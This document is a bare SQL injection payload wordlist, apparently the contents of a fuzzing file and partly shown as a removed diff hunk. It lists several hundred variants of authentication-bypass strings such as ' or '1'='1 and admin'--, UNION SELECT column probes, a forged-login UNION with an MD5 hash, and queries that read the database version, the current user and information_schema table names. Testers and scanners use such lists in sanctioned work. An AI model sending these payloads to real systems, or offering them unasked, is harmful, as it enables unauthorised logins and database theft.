||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
